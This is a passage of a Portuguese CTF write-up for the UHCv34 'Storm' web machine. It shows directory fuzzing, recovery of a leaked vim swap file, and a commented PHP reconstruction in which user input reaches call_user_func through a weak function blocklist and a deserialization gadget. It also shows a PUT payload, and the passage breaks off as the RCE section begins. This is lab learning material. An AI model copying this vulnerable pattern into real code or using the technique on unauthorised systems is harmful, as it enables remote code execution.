<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><title>UHCV34 - (Classificatória - Web) Write-Up - Storm</title><style>
/* webkit printing magic: print all background colors */
html {
	-webkit-print-color-adjust: exact;
}
* {
	box-sizing: border-box;
	-webkit-print-color-adjust: exact;
}

html,
body {
	margin: 0;
	padding: 0;
}
@media only screen {
	body {
		margin: 2em auto;
		max-width: 900px;
		color: rgb(55, 53, 47);
	}
}

body {
	line-height: 1.5;
	white-space: pre-wrap;
}

a,
a.visited {
	color: inherit;
	text-decoration: underline;
}

.pdf-relative-link-path {
	font-size: 80%;
	color: #444;
}

h1,
h2,
h3 {
	letter-spacing: -0.01em;
	line-height: 1.2;
	font-weight: 600;
	margin-bottom: 0;
}

.page-title {
	font-size: 2.5rem;
	font-weight: 700;
	margin-top: 0;
	margin-bottom: 0.75em;
}

h1 {
	font-size: 1.875rem;
	margin-top: 1.875rem;
}

h2 {
	font-size: 1.5rem;
	margin-top: 1.5rem;
}

h3 {
	font-size: 1.25rem;
	margin-top: 1.25rem;
}

.source {
	border: 1px solid #ddd;
	border-radius: 3px;
	padding: 1.5em;
	word-break: break-all;
}

.callout {
	border-radius: 3px;
	padding: 1rem;
}

figure {
	margin: 1.25em 0;
	page-break-inside: avoid;
}

figcaption {
	opacity: 0.5;
	font-size: 85%;
	margin-top: 0.5em;
}

mark {
	background-color: transparent;
}

.indented {
	padding-left: 1.5em;
}

hr {
	background: transparent;
	display: block;
	width: 100%;
	height: 1px;
	visibility: visible;
	border: none;
	border-bottom: 1px solid rgba(55, 53, 47, 0.09);
}

img {
	max-width: 100%;
}

@media only print {
	img {
		max-height: 100vh;
		object-fit: contain;
	}
}

@page {
	margin: 1in;
}

.collection-content {
	font-size: 0.875rem;
}

.column-list {
	display: flex;
	justify-content: space-between;
}

.column {
	padding: 0 1em;
}

.column:first-child {
	padding-left: 0;
}

.column:last-child {
	padding-right: 0;
}

.table_of_contents-item {
	display: block;
	font-size: 0.875rem;
	line-height: 1.3;
	padding: 0.125rem;
}

.table_of_contents-indent-1 {
	margin-left: 1.5rem;
}

.table_of_contents-indent-2 {
	margin-left: 3rem;
}

.table_of_contents-indent-3 {
	margin-left: 4.5rem;
}

.table_of_contents-link {
	text-decoration: none;
	opacity: 0.7;
	border-bottom: 1px solid rgba(55, 53, 47, 0.18);
}

table,
th,
td {
	border: 1px solid rgba(55, 53, 47, 0.09);
	border-collapse: collapse;
}

table {
	border-left: none;
	border-right: none;
}

th,
td {
	font-weight: normal;
	padding: 0.25em 0.5em;
	line-height: 1.5;
	min-height: 1.5em;
	text-align: left;
}

th {
	color: rgba(55, 53, 47, 0.6);
}

ol,
ul {
	margin: 0;
	margin-block-start: 0.6em;
	margin-block-end: 0.6em;
}

li > ol:first-child,
li > ul:first-child {
	margin-block-start: 0.6em;
}

ul > li {
	list-style: disc;
}

ul.to-do-list {
	text-indent: -1.7em;
}

ul.to-do-list > li {
	list-style: none;
}

.to-do-children-checked {
	text-decoration: line-through;
	opacity: 0.375;
}

ul.toggle > li {
	list-style: none;
}

ul {
	padding-inline-start: 1.7em;
}

ul > li {
	padding-left: 0.1em;
}

ol {
	padding-inline-start: 1.6em;
}

ol > li {
	padding-left: 0.2em;
}

.mono ol {
	padding-inline-start: 2em;
}

.mono ol > li {
	text-indent: -0.4em;
}

.toggle {
	padding-inline-start: 0em;
	list-style-type: none;
}

/* Indent toggle children */
.toggle > li > details {
	padding-left: 1.7em;
}

.toggle > li > details > summary {
	margin-left: -1.1em;
}

.selected-value {
	display: inline-block;
	padding: 0 0.5em;
	background: rgba(206, 205, 202, 0.5);
	border-radius: 3px;
	margin-right: 0.5em;
	margin-top: 0.3em;
	margin-bottom: 0.3em;
	white-space: nowrap;
}

.collection-title {
	display: inline-block;
	margin-right: 1em;
}

time {
	opacity: 0.5;
}

.icon {
	display: inline-block;
	max-width: 1.2em;
	max-height: 1.2em;
	text-decoration: none;
	vertical-align: text-bottom;
	margin-right: 0.5em;
}

img.icon {
	border-radius: 3px;
}

.user-icon {
	width: 1.5em;
	height: 1.5em;
	border-radius: 100%;
	margin-right: 0.5rem;
}

.user-icon-inner {
	font-size: 0.8em;
}

.text-icon {
	border: 1px solid #000;
	text-align: center;
}

.page-cover-image {
	display: block;
	object-fit: cover;
	width: 100%;
	height: 30vh;
}

.page-header-icon {
	font-size: 3rem;
	margin-bottom: 1rem;
}

.page-header-icon-with-cover {
	margin-top: -0.72em;
	margin-left: 0.07em;
}

.page-header-icon img {
	border-radius: 3px;
}

.link-to-page {
	margin: 1em 0;
	padding: 0;
	border: none;
	font-weight: 500;
}

p > .user {
	opacity: 0.5;
}

td > .user,
td > time {
	white-space: nowrap;
}

input[type="checkbox"] {
	transform: scale(1.5);
	margin-right: 0.6em;
	vertical-align: middle;
}

p {
	margin-top: 0.5em;
	margin-bottom: 0.5em;
}

.image {
	border: none;
	margin: 1.5em 0;
	padding: 0;
	border-radius: 0;
	text-align: center;
}

.code,
code {
	background: rgba(135, 131, 120, 0.15);
	border-radius: 3px;
	padding: 0.2em 0.4em;
	border-radius: 3px;
	font-size: 85%;
	tab-size: 2;
}

code {
	color: #eb5757;
}

.code {
	padding: 1.5em 1em;
}

.code-wrap {
	white-space: pre-wrap;
	word-break: break-all;
}

.code > code {
	background: none;
	padding: 0;
	font-size: 100%;
	color: inherit;
}

blockquote {
	font-size: 1.25em;
	margin: 1em 0;
	padding-left: 1em;
	border-left: 3px solid rgb(55, 53, 47);
}

.bookmark {
	text-decoration: none;
	max-height: 8em;
	padding: 0;
	display: flex;
	width: 100%;
	align-items: stretch;
}

.bookmark-title {
	font-size: 0.85em;
	overflow: hidden;
	text-overflow: ellipsis;
	height: 1.75em;
	white-space: nowrap;
}

.bookmark-text {
	display: flex;
	flex-direction: column;
}

.bookmark-info {
	flex: 4 1 180px;
	padding: 12px 14px 14px;
	display: flex;
	flex-direction: column;
	justify-content: space-between;
}

.bookmark-image {
	width: 33%;
	flex: 1 1 180px;
	display: block;
	position: relative;
	object-fit: cover;
	border-radius: 1px;
}

.bookmark-description {
	color: rgba(55, 53, 47, 0.6);
	font-size: 0.75em;
	overflow: hidden;
	max-height: 4.5em;
	word-break: break-word;
}

.bookmark-href {
	font-size: 0.75em;
	margin-top: 0.25em;
}

.sans { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol"; }
.code { font-family: "SFMono-Regular", Consolas, "Liberation Mono", Menlo, Courier, monospace; }
.serif { font-family: Lyon-Text, Georgia, YuMincho, "Yu Mincho", "Hiragino Mincho ProN", "Hiragino Mincho Pro", "Songti TC", "Songti SC", "SimSun", "Nanum Myeongjo", NanumMyeongjo, Batang, serif; }
.mono { font-family: iawriter-mono, Nitti, Menlo, Courier, monospace; }
.pdf .sans { font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol", 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC', 'Noto Sans CJK KR'; }

.pdf .code { font-family: Source Code Pro, "SFMono-Regular", Consolas, "Liberation Mono", Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC', 'Noto Sans Mono CJK KR'; }

.pdf .serif { font-family: PT Serif, Lyon-Text, Georgia, YuMincho, "Yu Mincho", "Hiragino Mincho ProN", "Hiragino Mincho Pro", "Songti TC", "Songti SC", "SimSun", "Nanum Myeongjo", NanumMyeongjo, Batang, serif, 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC', 'Noto Sans CJK KR'; }

.pdf .mono { font-family: PT Mono, iawriter-mono, Nitti, Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC', 'Noto Sans Mono CJK KR'; }

.highlight-default {
}
.highlight-gray {
	color: rgb(155,154,151);
}
.highlight-brown {
	color: rgb(100,71,58);
}
.highlight-orange {
	color: rgb(217,115,13);
}
.highlight-yellow {
	color: rgb(223,171,1);
}
.highlight-teal {
	color: rgb(15,123,108);
}
.highlight-blue {
	color: rgb(11,110,153);
}
.highlight-purple {
	color: rgb(105,64,165);
}
.highlight-pink {
	color: rgb(173,26,114);
}
.highlight-red {
	color: rgb(224,62,62);
}
.highlight-gray_background {
	background: rgb(235,236,237);
}
.highlight-brown_background {
	background: rgb(233,229,227);
}
.highlight-orange_background {
	background: rgb(250,235,221);
}
.highlight-yellow_background {
	background: rgb(251,243,219);
}
.highlight-teal_background {
	background: rgb(221,237,234);
}
.highlight-blue_background {
	background: rgb(221,235,241);
}
.highlight-purple_background {
	background: rgb(234,228,242);
}
.highlight-pink_background {
	background: rgb(244,223,235);
}
.highlight-red_background {
	background: rgb(251,228,228);
}
.block-color-default {
	color: inherit;
	fill: inherit;
}
.block-color-gray {
	color: rgba(55, 53, 47, 0.6);
	fill: rgba(55, 53, 47, 0.6);
}
.block-color-brown {
	color: rgb(100,71,58);
	fill: rgb(100,71,58);
}
.block-color-orange {
	color: rgb(217,115,13);
	fill: rgb(217,115,13);
}
.block-color-yellow {
	color: rgb(223,171,1);
	fill: rgb(223,171,1);
}
.block-color-teal {
	color: rgb(15,123,108);
	fill: rgb(15,123,108);
}
.block-color-blue {
	color: rgb(11,110,153);
	fill: rgb(11,110,153);
}
.block-color-purple {
	color: rgb(105,64,165);
	fill: rgb(105,64,165);
}
.block-color-pink {
	color: rgb(173,26,114);
	fill: rgb(173,26,114);
}
.block-color-red {
	color: rgb(224,62,62);
	fill: rgb(224,62,62);
}
.block-color-gray_background {
	background: rgb(235,236,237);
}
.block-color-brown_background {
	background: rgb(233,229,227);
}
.block-color-orange_background {
	background: rgb(250,235,221);
}
.block-color-yellow_background {
	background: rgb(251,243,219);
}
.block-color-teal_background {
	background: rgb(221,237,234);
}
.block-color-blue_background {
	background: rgb(221,235,241);
}
.block-color-purple_background {
	background: rgb(234,228,242);
}
.block-color-pink_background {
	background: rgb(244,223,235);
}
.block-color-red_background {
	background: rgb(251,228,228);
}
.select-value-color-default { background-color: rgba(206,205,202,0.5); }
.select-value-color-gray { background-color: rgba(155,154,151, 0.4); }
.select-value-color-brown { background-color: rgba(140,46,0,0.2); }
.select-value-color-orange { background-color: rgba(245,93,0,0.2); }
.select-value-color-yellow { background-color: rgba(233,168,0,0.2); }
.select-value-color-green { background-color: rgba(0,135,107,0.2); }
.select-value-color-blue { background-color: rgba(0,120,223,0.2); }
.select-value-color-purple { background-color: rgba(103,36,222,0.2); }
.select-value-color-pink { background-color: rgba(221,0,129,0.2); }
.select-value-color-red { background-color: rgba(255,0,26,0.2); }

.checkbox {
	display: inline-flex;
	vertical-align: text-bottom;
	width: 16;
	height: 16;
	background-size: 16px;
	margin-left: 2px;
	margin-right: 5px;
}

.checkbox-on {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20width%3D%2216%22%20height%3D%2216%22%20fill%3D%22%2358A9D7%22%2F%3E%0A%3Cpath%20d%3D%22M6.71429%2012.2852L14%204.9995L12.7143%203.71436L6.71429%209.71378L3.28571%206.2831L2%207.57092L6.71429%2012.2852Z%22%20fill%3D%22white%22%2F%3E%0A%3C%2Fsvg%3E");
}

.checkbox-off {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20x%3D%220.75%22%20y%3D%220.75%22%20width%3D%2214.5%22%20height%3D%2214.5%22%20fill%3D%22white%22%20stroke%3D%22%2336352F%22%20stroke-width%3D%221.5%22%2F%3E%0A%3C%2Fsvg%3E");
}
	
</style></head><body><article id="3b51bef8-0a59-4f4d-b5f8-522462695fa4" class="page sans"><header><img class="page-cover-image" src="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/aaaa.png" style="object-position:center 44.29%"/><div class="page-header-icon page-header-icon-with-cover"><img class="icon" src="https://image.flaticon.com/icons/png/512/263/263884.png"/></div><h1 class="page-title">UHCV34 - (Classificatória - Web) Write-Up - Storm</h1><table class="properties"><tbody><tr class="property-row property-row-multi_select"><th><span class="icon property-icon"><svg viewBox="0 0 14 14" style="width:14px;height:14px;display:block;fill:rgba(55, 53, 47, 0.4);flex-shrink:0;-webkit-backface-visibility:hidden" class="typesMultipleSelect"><path d="M4,3 C4,2.447715 4.447715,2 5,2 L12,2 C12.5523,2 13,2.447716 13,3 C13,3.55228 12.5523,4 12,4 L5,4 C4.447715,4 4,3.55228 4,3 Z M4,7 C4,6.447715 4.447715,6 5,6 L12,6 C12.5523,6 13,6.447716 13,7 C13,7.55228 12.5523,8 12,8 L5,8 C4.447715,8 4,7.55228 4,7 Z M4,11 C4,10.447715 4.447715,10 5,10 L12,10 C12.5523,10 13,10.447716 13,11 C13,11.55228 12.5523,12 12,12 L5,12 C4.447715,12 4,11.55228 4,11 Z M2,4 C1.44771525,4 1,3.55228475 1,3 C1,2.44771525 1.44771525,2 2,2 C2.55228475,2 3,2.44771525 3,3 C3,3.55228475 2.55228475,4 2,4 Z M2,8 C1.44771525,8 1,7.55228475 1,7 C1,6.44771525 1.44771525,6 2,6 C2.55228475,6 3,6.44771525 3,7 C3,7.55228475 2.55228475,8 2,8 Z M2,12 C1.44771525,12 1,11.5522847 1,11 C1,10.4477153 1.44771525,10 2,10 C2.55228475,10 3,10.4477153 3,11 C3,11.5522847 2.55228475,12 2,12 Z"></path></svg></span>vulns and exploitations</th><td><span class="selected-value select-value-color-default">code review</span><span class="selected-value select-value-color-green">insecure deserealization</span><span class="selected-value select-value-color-red">leak source</span><span class="selected-value select-value-color-orange">reversing</span><span class="selected-value select-value-color-gray">suid</span><span class="selected-value select-value-color-green">swp</span></td></tr></tbody></table></header><div class="page-body"><h3 id="efcf3c7e-10d1-4141-b561-3ffcdb2bd087" class="">Escrito por: Vinicius (big0us)<mark class="highlight-yellow"> </mark><mark class="highlight-teal"> </mark></h3><p id="8c4947a0-9aae-433f-9715-c60c8f50c466" class="">Tenho 16 anos, jogo CTF faz alguns meses e também participo do UHC aos finais de semanas. Essa máquina foi feita pelo Kadu para a classificatória do UHCv34.</p><ul id="a081af3a-4b4e-44e2-850f-e61833c1ce48" class="toggle"><li><details open=""><summary>Meus perfis</summary><figure id="dcdb14bf-2864-4cb4-ab0a-442378b2d21f"><a href="https://github.com/viniciuspereiras/" class="bookmark source"><div class="bookmark-info"><div class="bookmark-text"><div class="bookmark-title">viniciuspereiras - Overview</div><div class="bookmark-description">as vezes &quot;big0us&quot; for fun :). viniciuspereiras has one repository available. Follow their code on GitHub.</div></div><div class="bookmark-href"><img src="https://github.com/favicon.ico" class="icon bookmark-icon"/>https://github.com/viniciuspereiras/</div></div><img src="https://avatars2.githubusercontent.com/u/69733777?s=400&amp;u=0132e5e4a44d7bd0eb01176e2187618a1f7aa887&amp;v=4" class="bookmark-image"/></a></figure><figure id="d329d83e-12f5-40b1-a1f7-0aaecd7d9659"><a href="https://tryhackme.com/p/big0us" class="bookmark source"><div class="bookmark-info"><div class="bookmark-text"><div class="bookmark-title">TryHackMe | big0us</div><div class="bookmark-description">TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser!</div></div><div class="bookmark-href"><img src="https://assets.tryhackme.com/img/favicon.png" class="icon bookmark-icon"/>https://tryhackme.com/p/big0us</div></div><img src="https://tryhackme-images.s3.amazonaws.com/user-avatars/acbda194c8e42a3049fb6ffcbf6dc290.png" class="bookmark-image"/></a></figure><figure id="781eebcc-93e8-4403-ae73-fee68e9f5560"><a href="https://www.hackthebox.eu/home/users/profile/406363" class="bookmark source"><div class="bookmark-info"><div class="bookmark-text"><div class="bookmark-title">Hack The Box :: Penetration Testing Labs</div><div class="bookmark-description">Login to the Hack The Box platform and take your pen-testing and cyber security skills to the next level!</div></div><div class="bookmark-href"><img src="https://www.hackthebox.eu/images/favicon.png" class="icon bookmark-icon"/>https://www.hackthebox.eu/home/users/profile/406363</div></div><img src="https://www.hackthebox.eu/images/favicon.png" class="bookmark-image"/></a></figure></details></li></ul><h1 id="2df0bf74-7dbc-4a82-b90f-a026a64d9afe" class="">Recon</h1><p id="f4d8cdc3-7d52-4b5f-bfa5-589f911d501c" class="">A página inicial dessa maquina é apenas uma foto de uma tempestade gigante, e podemos comprovar isso vendo o source code...</p><figure id="d0986417-9b82-41af-9703-cef67a5a37b2" class="image"><a href="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled.png"><img style="width:480px" src="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled.png"/></a></figure><figure id="a40b438c-5a95-4a7e-8579-20102b2eaa41" class="image"><a href="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%201.png"><img style="width:480px" src="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%201.png"/></a></figure><p id="a9c8c6bc-8c0e-4009-b0fa-775f24c4783b" class="">Como de costume em todos os recons, vamos fazer um fuzzing em busca de diretórios e arquivos, utilizarei o ffuf com as wordlists &quot;common.txt&quot; e &quot;quickhits.txt&quot;.</p><p id="4364bf3a-bd69-4e81-a39e-fe01a01607dc" class=""><mark class="highlight-red">common.txt:</mark></p><figure id="97abc91b-cd33-40ee-bb44-5a310ceb8dfb" class="image"><a href="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%202.png"><img style="width:830px" src="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%202.png"/></a></figure><p id="fb53e5e8-b574-404a-9310-2853653817b7" class="">Encontramos duas coisas interessantes, info.php e config.php:</p><ul id="fef3ba85-26c1-4c38-9b20-b20d2f69f121" class="bulleted-list"><li>info.php:
parece que tem um phpinfo() rodando ai..., interessante para pegarmos algumas informações de versão de serviços e software, além de informações sobre a configuração do servidor. (Pesquisei por exploits para os serviços porém nada foi encontrado 😢)</li></ul><figure id="9cbe1633-8f1c-4820-bea0-d9df5ce54c9f" class="image"><a href="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%203.png"><img style="width:624px" src="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%203.png"/></a></figure><ul id="2d7d11cc-81b6-4016-98f7-54d361a54738" class="bulleted-list"><li>config.php</li></ul><p id="3d61f102-d909-4678-8b54-46ce1b8aab4a" class="">Ops! (Status code 200, muito estranho, rs)</p><figure id="bbd4fdcd-9a7e-4155-b405-05bc810efdeb" class="image"><a href="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%204.png"><img style="width:432px" src="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%204.png"/></a></figure><p id="c8541c8e-e5bb-42dd-8bcd-5a11813f16db" class=""><mark class="highlight-red">quickhits.txt:</mark></p><figure id="5653e706-73e8-4afc-9223-7ccdd0b69590" class="image"><a href="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%205.png"><img style="width:576px" src="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%205.png"/></a></figure><p id="8c124d05-a577-4764-bf6f-2d37515ba7d1" class="">Opa! No meio de vários falsos positivos encontramos um arquivo chamado &quot;.config.php.swp&quot;, parece ser um arquivo de swap do vim (gerado quando se abre um arquivo no vim, no caso o que foi aberto foi o config.php). </p><figure id="2c203b28-1a22-45a0-beeb-6927cbc286f5" class="image"><a href="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%206.png"><img style="width:1366px" src="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%206.png"/></a></figure><p id="e888a362-88a3-4ad4-b5bc-51e30e3736b5" class="">Como podemos ver é o código php do arquivo &quot;config.php&quot;.</p><p id="d5ed97fd-7403-4e1e-a88e-0c7feba02fd7" class="">Observando com o Ctrl+U (View-Source) podemos ver a primeira flag!</p><figure id="9765018e-6077-4e05-8c39-99c45b0a98fa" class="image"><a href="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%207.png"><img style="width:324px" src="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%207.png"/></a></figure><p id="b33d538f-7458-4a05-8ad8-8ac92977ef98" class="">Parece que teremos de fazer um code review nesse código e entender aquele Access Denided que recebemos no config.php...</p><p id="172f3856-fb89-40ee-8198-ad6a86da17f6" class="">Para melhorar nossa visualização vamos tentar recuperar esse arquivo usando o próprio vim:</p><pre id="fbe2d5c8-c079-47aa-a104-b44c659be280" class="code"><code>wget https://storm.uhclabs.com/.config.php.swp #download the file
vim -r .config.php.swp #recover the file</code></pre><p id="de50aa7e-4c99-4345-a292-21fb3533b4cf" class="">Agora apenas dei enter.</p><figure id="936dfe82-e765-401a-9983-6967fcfbe522" class="image"><a href="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%208.png"><img style="width:559px" src="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%208.png"/></a></figure><p id="21e8de46-7e7b-457c-b278-916dd9591948" class="">Lets debug friends!</p><figure id="cf952252-bf3b-477a-bdc3-0045bf2be8ab" class="image"><a href="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%209.png"><img style="width:1366px" src="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%209.png"/></a></figure><p id="d66ba687-0e2f-4ecb-84a3-6e918c07e451" class="">(Essa parte do write-up vai exigir o básico de php, tentarei explicar da melhor forma, mas se você não entende muito de php, um aviso, você vai ficar meio doido)</p><h2 id="411fcfea-a583-418e-85fc-c9ad6a0bd77f" class="">Recon - Code Review</h2><p id="f951bb29-c848-45c8-89ae-45c2e44930eb" class="">Para entender eu recomendo fortemente que você reproduza o ambiente na sua máquina!</p><p id="1314761b-8ee0-491a-90c2-580d2a70a66c" class="">Aqui está o motivo de recebermos acesso negado!</p><figure id="4edd0d05-7a47-4bf8-b0e1-224533037299" class="image"><a href="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%2010.png"><img style="width:816px" src="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%2010.png"/></a></figure><p id="398b0ae9-62d8-4f1a-b477-1a9720ba8544" class="">Eu reproduzi o ambiente localmente, ai vai meu código comentado para entendermos:</p><p id="ee9044d8-b23e-479e-a483-0e4481705647" class="">(Amigos brasileiros, desculpa por estar em inglês, é para o pessoal poder entender o código)</p><pre id="7ea25f2d-759d-48bb-8438-fb8148f8f9e0" class="code"><code>&lt;?php
//my reproduce script
Class UHCProtocol{                   //declare a new class 
    public $data;
    public function __wakeup(){      //exploitable function by insecure deserealization**
    $this-&gt;add();
    }
    public function add(){
        return call_user_func($this-&gt;data, $_SERVER[&#x27;QUERY_STRING&#x27;]); //call a function with value of $data and use arguments with value in query string of the http request
    }

if($_SERVER[&#x27;REQUEST_METHOD&#x27;] == &quot;PUT&quot;){  //verify type of the request, in case we have to use PUT

$raw = file_get_contents(&quot;php://input&quot;); //put on $raw all contents of request body (php://input is the request body)

    if(strpos($raw, &quot;::&quot;) !== false){ //verify if have &quot;::&quot; on $raw content and if yes return true
        $call = explode(&quot;::&quot;, $raw); //separte in a array $raw by &quot;::&quot; and put this on array named $call
        $badfuncs = [&#x27;system&#x27;, &#x27;aaaa&#x27;];  //declare a array with denided functions

        if(in_array($call[0], $badfuncs)){ //verify if in first part of $raw, before :: ($call[0]) have any of denides functions
            die(&quot;Denied Func!&quot;); //if yes, die() with a message &quot;Denied Func!&quot;
        }
        if(strpos($call[1], &quot;|&quot;) !== false){ //verify if in second part of $raw, after :: ($call[1]) have a &quot;|&quot;
            $data = explode(&quot;|&quot;, $call[1]); //if yes separate $call[1] by | and put this on a array named $data
            call_user_func_array($call[0], $data); //call a function with $call[0] value and $data value in arguments
        }else{ //if not...
            call_user_func($call[0], $call[1]); //call a function with $call[0] value and $call[1] value in arguments
        }
    }
}
?&gt;</code></pre><p id="beb6400c-2361-4a07-9237-11a8d644b4d2" class="">Basicamente o que temos que fazer para começar a testar é mandar um request PUT e nos valores do body passar nossa payload contendo &quot;::&quot;. Dando uma lida sobre como usar a função call_user_func do php podemos perceber que o primeiro argumento é o nome da função que queremos rodar, e o segundo argumento são os valores a serem passados para essa função, exemplo:</p><pre id="c891ce3b-b4ed-4d9d-ab6f-2d50d8a2c0f5" class="code"><code>call_user_func(&quot;print_r&quot;, &quot;hello&quot;); //will print &quot;hello&quot;</code></pre><p id="ca7cb052-99da-4196-ac54-850639da7e68" class="">Como podemos observar no nosso código comentado, se seguirmos as validações do if, o código deverá executar uma função que colocarmos antes do &quot;::&quot; e os argumentos serão os valores que colocarmos depois do &quot;::&quot;.</p><pre id="50cbdf2f-ecb3-48d7-b622-3893e169b3ab" class="code"><code>print_r::hello</code></pre><p id="b1f5235b-1f59-4e3e-90de-7414ed95ff30" class="">Vamos abrir o burp e enviar esse PUT contendo nossa payload.</p><figure id="534307ea-8afd-486a-8e74-b7f20efb1ee0" class="image"><a href="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%2011.png"><img style="width:1024px" src="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%2011.png"/></a></figure><p id="c33b536f-1795-4fce-98df-a095e189a2e8" class="">Recebemos Access Denided!, isso deve ser pelo fato de estarmos acessando o config.php, vamos então pensar, para que um script &quot;config.php&#x27; é usado? para setar todas as variáveis e classes de configuração do site, portando outras páginas do site dão um include nele...</p><p id="c7a9f86b-214c-49bb-9703-aaa4c0b1d9dd" class="">Vamos mandar o request para index.php, ja que provavelmente ele inclui o config.php no código...</p><figure id="52c329df-3ffb-45a6-bd9d-4e60ba6f8cf7" class="image"><a href="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%2012.png"><img style="width:986px" src="UHCV34%20-%20(Classificato%CC%81ria%20-%20Web)%20Write-Up%20-%20Storm%203b51bef80a594f4db5f8522462695fa4/Untitled%2012.png"/></a></figure><p id="90be709d-4b28-43bf-99b6-d1de0572b43f" class="">Deu certo, bom agora vamos ver o que podemos fazer com isso, usar funções para ler arquivos (LFI), rodar funções de sistema? Não pois elas estão sendo checadas na nossa payload, então o que vamos fazer?</p><p id="d7da3fea-b769-48db-a293-12f79bff8d8f" class="">Lembram do comentário na função wakeup da classe?</p><p id="f9a3a26b-2974-413c-ac65-4c88f1af01c9" class="">O que vamos ter que fazer é uma desseralização insegura!</p><h1 id="e4ae529f-877a-4ccd-8df9-fb56d7ea3cfa" class="">Exploitation - RCE</h1><figure id="08423056-81f9-4a59-8238-6677483a7379"><a href="https://book.hacktricks.xyz/pentesting-web/deserialization" class="bookmark source"><div class="bookmark-info"><div class="bookmark-text"><div class="bookmark-title">Deserialization</div><div class="bookmark-description">When the object gets unpickle, the function will be executed. When exploited, server could return an error. You could try to to search for possible gadget chains that can be exploited. When running check all the libraries known to be vulnerable and that can provide an exploit for.</div></div><div class="bookmark-href"><img src="https://gblobscdn.gitbook.com/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Favatar.png?alt=media" class="icon bookmark-icon"/>https://book.hacktricks.xyz/pentesting-web/deserialization</div></div><img src="https://app.gitbook.com/share/space/thumbnail/-L_2uGJGU7AVNRcqRvEi.png" class="bookmark-image"/></a></figure><p id="ad97d9e3-3796-4662-aea1-096492ffe1d7" class="">Recomendo quem não souber do que se trata dar uma pesquisada em alguns artigos.</p><p id="db323e61-7ca0-4bb1-a123-38237e9622df" class="">Aqui vai o código da classe vulnerável:</p><pre 